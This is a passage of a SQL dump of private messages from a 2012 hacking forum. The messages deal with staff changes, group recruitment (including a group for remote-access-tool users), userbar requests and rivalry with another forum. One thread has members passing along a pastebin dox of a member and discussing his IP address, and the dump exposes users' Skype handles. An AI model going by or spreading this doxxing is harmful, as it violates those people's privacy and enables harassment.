`subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2706', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: i need you PLZ', '0', '[quote=\'NeonLights\'] i was wondering if u could make me a userbard similar to this one: [img]http://imageshack.us/a/img802/7561/ratters.gif[/img] but make the ratters green,red,yellow :D if its prossible plz i really need this for my group to work out il give u a spot if u want :) plz reply soon [/quote] you need this quick, im abit busy with my gf atm.', '1349728080', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4125', '206', '62', '206', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Hi :)', '0', 'Hey, how re you. hope all good. I\'m new to this community and just thought if you could help me out a bit. Can you guide me please :) and also I love your signature, can you give the wings to me please :) and the font name please Thank you -Aayush', '1352801874', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4126', '1', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '1', 'Re: I need your help', '0', '[quote=\'t3h jok3r\'] I think I have RAT or Keylogger installed on my PC and I want it removed. [/quote] For Remote Administration Tool (RAT) infections Download Comodo\'s Firewall, The firewall allows you to monitor/block outbound connections and inbound connections. For malware infections with keyhooks (keyloggers) Download KeyScrambler, the software will spoof all the entered keys so the when the author gets the logs it will be displayed.. for an example \"1¨\'-.123fwi&#\"\"ed!\"!DQ\" instead of what you actuall typed, letters/numbers/symbols. If you still need help, I can help you even more. I have to do some stuff right now. ', '1352805146', '0', '1', '0', '1', '0', '0', '1352823617'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4127', '199', '1', '199', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: I need your help', '0', '[quote=\'t3h jok3r\'] I think I have RAT or Keylogger installed on my PC and I want it removed. [/quote] For Remote Administration Tool (RAT) infections Download Comodo\'s Firewall, The firewall allows you to monitor/block outbound connections and inbound connections. For malware infections with keyhooks (keyloggers) Download KeyScrambler, the software will spoof all the entered keys so the when the author gets the logs it will be displayed.. for an example \"1¨\'-.123fwi&#\"\"ed!\"!DQ\" instead of what you actuall typed, letters/numbers/symbols. If you still need help, I can help you even more. I have to do some stuff right now. ', '1352805146', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2998', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Yo', '0', 'Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.', '1350091099', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2720', '62', '214', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"214\";}}', '2', 'Unique', '0', 'you have negative rep, so I will decline your request.', '1349729061', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2724', '240', '1', '240', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Checking out LH?', '0', '[quote=\'t3h jok3r\'] [quote=\'Hardz\'] [quote=\'t3h jok3r\'] 1. Moderator at Anarchy forums. 2. After \"stalking\" you on my board, I have noticed that you are going through my members profiles for the past 30 mins. 3. I\'m requesting you nicely to either leave or stay on L33THacking and be HQ + Active. If you spam, continue to view profiles, send messages violating our rules and regulations or DDoS LH then they will be consequences. Therefore, I\'m sending this PM to warn you and once again either leave LH or stay here and be HQ + Active. [/quote] Hello t3h jok3r, Let\'s not bring AnarchyForums Moderator Status into this conversation - it\'s not needed. You may think it \'sucks\', but that\'s your opinion. I\'ve been browsing through your site just observing if it was a place for me to stay - it looks quite good. I\'m not spamming (haven\'t made a single post), I\'m not sure what\'s wrong with viewing profiles & I am in no way sending any messages violating your rules. And I can assure you no one on AF was ddosing your site - that was nothing to do with us. [/quote] Sure, if you would like to keep Anarchy forums out of this conversation then I sure will. The thing is I\'m sure you are aware of what happened between L33THacking and Anarchy and you are right there\'s nothing wrong in observing but you keep on constantly viewing the same profiles and the \"I\'m BreShie\" thread. It\'s just that I can\'t let my members personal information get compromised such as our member iTzIpods information got exposed by Anarchy Forums owner. [/quote] I was just interesting in seeing why BreShie left and suddenly became so determined to \'screw\' AF\'. Anarchist is a good guy - despite what you may think. He wouldn\'t reveal iTzTpods information because it is nothing to do with him and it wouldn\'t be even remotely fair.', '1349729191', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('4121', '2', '2', '4', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'Help', '0', 'I\'m t3h jok3r and I got hacked. Add me on skype t3hjok3r Come online asap.', '1352771034', '0', '3', '1352811673', '1', '0', '0', '1352811630'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2726', '214', '62', '214', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: Unique', '0', '[quote=\'R?????zo?\'] you have negative rep, so I will decline your request. [/quote] No I do not have negative rep?', '1349729357', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2996', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Suggestion....', '0', 'Yo in the general sectio it says updates, suggestions and announcements. Make that Updates and Announcements and only allow staff to post there. People are posting random shit in the announcements. Only important shot shod go there. Have people post I the general section if they want to discuss something :)', '1350081037', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2737', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: i need you PLZ', '0', 'something like this bro? http://imageshack.us/a/img38/7561/ratters.gif', '1349730574', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2739', '62', '214', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"214\";}}', '2', 'Re: Unique', '0', '[quote=\'Rave™\'] [quote=\'R?????zo?\'] you have negative rep, so I will decline your request. [/quote] No I do not have negative rep? [/quote] you had before, also our last talk on skype was not that famous.', '1349730684', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2991', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Joining Ratters', '0', 'Heyo, sorry about that, I hadn\'t made the recruitment thread for Ratters yet. You can join because I know you\'re HQ so enjoy the group :) If you wanna help me make the recruitment thread that would be awesome because I don\'t have a huge amount of time right now heres what I have so far- [align=center][size=medium][color=#E6E6FA] Hello everybody, GRONgamer here. This is the Official recruitment thread for Ratters. This group is for any member that enjoys using Remote Administration Tools or teaching others how to use them. Therefor I will take any member into consideration, as long as you meet the small requirements I\'ve listed below. 1.) Must have at LEAST 30+ posts. 2.) Must have at least [/color][/size][/align] ', '1350054482', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2987', '2', '224', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"224\";}}', '2', 'Re: Site', '0', '[quote=\'monkey\'] How much would it cost to buy the site DB so I can merge it with my site and to get it to redirect to my site? Serious question. [/quote] I have no idea sorry.', '1350037594', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2980', '205', '228', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Re: Thread', '0', '[quote=\'VirtualLegend\'] Check my new Thread: http://l33thacking.net/thread-807.html [/quote] Cheers mate, I shall check It out. Thanks :)', '1350015133', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2982', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'GIVEAWAY CONTEST', '0', 'Hi, I have a new Thread about a Huge GIVEAWAY. I want that everyone is involved in the Contest, so thats why I\'m asking you can you PM everyone to go to my contest i will be glad if you do it and you will receive the Huge Ultimate Pack too. Thread: http://l33thacking.net/thread-822.html Bye,', '1350030248', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2985', '62', '232', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"232\";}}', '2', 'Re: LH Coders - Your Project', '0', '[quote=\'BreShiE\'] Hey there, R?????zo?. In order to keep the LHC free of people whom claim to code, but can\'t, each applicant is assigned a project which must be completed within 72 hours. All projects are different to one another to keep it free flowing and not-easily copied amongst other members. You may code the project in any language you choose. You can: [list] [*]Use google to help you [*]Ask for help in the forums [*]Submit the project anytime, as long as it\'s within the 72 hours [/list] You cannot: [list] [*]Copy and Paste [*]Get others to complete the project for you [*]Submit a project after the 72 hours [/list] You must: [list] [*]Use correct indentation [*]Comment out code [*]Complete to the best of your ability [*]Release your project into the correct section in a formal manner [/list] [b]Your project:[/b] You\'re to create a program which will return the source code of a web page. This should then be able to be edited by the user, and have a preview of the code. [/quote] I will have to decline my apply since i\'m short on time now, busy with my job and girlfriend. So I don\'t have the time for this, I might apply later when I got some free time. Thanks for understanding', '1350036195', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3031', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin? [/quote] Giving him another chance he said he was away because of the thanksgiving. [/quote] You know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back. [/quote] Can I get a screenshot or something to back up myself while talking to him? [/quote] Nevermind it was on 10-9-12 but if you want that screenshot then I could get it for you. [/quote] When was the last post? [/quote] 10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy. [/quote] Well OK then ;) [/quote] Does that help you? [/quote] Nope, it basically backups his story which means that he was out of town. BTW do you know the user Monkey? [/quote] Nope [/quote] ok, I don\'t know why but I sleepy already. It\'s like 10 now and I normally sleep at 2. [/quote] Oh damn', '1350095669', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2796', '214', '203', '214', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Hey', '0', 'hey man my skype is Spushkin1', '1349744962', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2804', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro check my rep and see what NeonLights put. No body likes me lol. [/quote] He put nothing? [/quote] Yea he took it off.', '1349749251', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2806', '222', '203', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: fearless group', '0', '[quote=\'NeonLights\'] Hey, its me neon was wondering how do i join the new group fearless? hope to hear from you soon :) [/quote] Yep added you guys. I hope to see content and stuff in the fearless group section. :D', '1349750270', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2812', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', '[quote=\'t3h jok3r\'] I\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking? [/quote] I would love that man.', '1349752085', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2815', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] I\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking? [/quote] I would love that man. [/quote] Alright and if you had to give your Staff position to someone, who would you give it too? [/quote] Thats a tough one. Probably gron gamer. I like him, but I don\'t know I would say ipod but hes gone.', '1349752650', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2818', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', 'Id like to see him back in power. If he took my place and I was moved to admin I would be happy about that.', '1349752747', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2820', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] I\'m thinking (Not confirmed) of replacing Apathy so I\'m wondering if you would be interested in becoming an Admin on L33THacking? [/quote] I would love that man. [/quote] Alright and if you had to give your Staff position to someone, who would you give it too? [/quote] I hope you don\'t mind this either http://l33thacking.net/user-246.html Thats a tough one. Probably gron gamer. I like him, but I don\'t know I would say ipod but hes gone. [/quote] What is your opinion on Reborn? [/quote]', '1349752821', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2824', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Admin', '0', 'Yeah like I said, If you give back reborn smod, virtual legend mod and me admin Id be 100% happy with that.', '1349753058', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2828', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Fearless', '0', '[quote=\'t3h jok3r\'] Can I be a member of your group? [/quote] Yes of course :D....As I told the other members of the group I hope to see you guys releasing some nice SE content and some of your own methods. :D', '1349758220', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2830', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro check my rep and see what NeonLights put. No body likes me lol. [/quote] He put nothing? [/quote] Yea he took it off. [/quote] OK and do you want his DOX? [/quote] Yes please', '1349758314', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2834', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey....', '0', 'You have to request to be in the group....do that and then I can... :D. Like on the groups page or whatever', '1349758406', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2836', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'ooooopps', '0', 'Oh nevermind figured out how to just add you manually....', '1349758472', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2839', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: ooooopps', '0', '[quote=\'t3h jok3r\'] [quote=\'flamingworm\'] Oh nevermind figured out how to just add you manually.... [/quote] Lol so did you add me? [/quote] Yeh lol...you should be good :D', '1349758867', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2841', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro check my rep and see what NeonLights put. No body likes me lol. [/quote] He put nothing? [/quote] Yea he took it off. [/quote] OK and do you want his DOX? [/quote] Yes please [/quote] It\'s on Pastebin, type in Dox of iTzIpod [/quote] Okay I got it, too bad it doesnt have his address.', '1349758923', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2845', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: ooooopps', '0', '[quote=\'t3h jok3r\'] [quote=\'flamingworm\'] [quote=\'t3h jok3r\'] [quote=\'flamingworm\'] Oh nevermind figured out how to just add you manually.... [/quote] Lol so did you add me? [/quote] Yeh lol...you should be good :D [/quote] Good in? [/quote] Yes as long as you contribute to the social engineering section and contribute to discussions in the fearless section than you will stay in :D. And yes you are in', '1349759434', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2847', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ridiculous ', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro check my rep and see what NeonLights put. No body likes me lol. [/quote] He put nothing? [/quote] Yea he took it off. [/quote] OK and do you want his DOX? [/quote] Yes please [/quote] It\'s on Pastebin, type in Dox of iTzIpod [/quote] Okay I got it, too bad it doesnt have his address. [/quote] It has his IP tough lol. [/quote] Okay I will see what I can do.', '1349760126', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2850', '249', '61', '249', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'API', '0', 'Hey NXK, May I please have the API for the Skype Resolver? Thanks -Ulti', '1349769598', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2852', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Skype', '0', '[quote=\'t3h jok3r\'] Can you come on Skype need to talk. [/quote] Sorry I wasn\'t online last night I have class in the morning. Ill be on at around 3pm today.', '1349783809', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2854', '61', '249', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"249\";}}', '2', 'Re: API', '0', '[quote=\'Ultimatum\'] Hey NXK, May I please have the API for the Skype Resolver? Thanks -Ulti [/quote] API is down.', '1349783837', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2860', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Skype group....', '0', 'Hey if you would like to be apart of our skype group then just let me know....my skype name is : flamingworm. I can add you to the group when I get home', '1349811683', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2862', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Name change....', '0', 'Hey can I change my name to ƒ???????????g :D....thanks', '1349811850', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2864', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Nvm about the username...', '0', 'Obviously I figured it out :)', '1349813532', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3025', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH. [/quote] Offshore or onshore? [/quote] Doesnt matter, it might or might not contain hacking. [/quote] For onshore I could a cheap hosting but domain depends. [/quote] Oh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also. [/quote] Yeah I noticed. [/quote] Also is apathy still going to be an admin? [/quote] Giving him another chance he said he was away because of the thanksgiving. [/quote] You know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back. [/quote] Can I get a screenshot or something to back up myself while talking to him? [/quote] Nevermind it was on 10-9-12 but if you want that screenshot then I could get it for you. [/quote] When was the last post? [/quote] 10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy. [/quote] Well OK then ;) [/quote] Does that help you?', '1350094822', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) 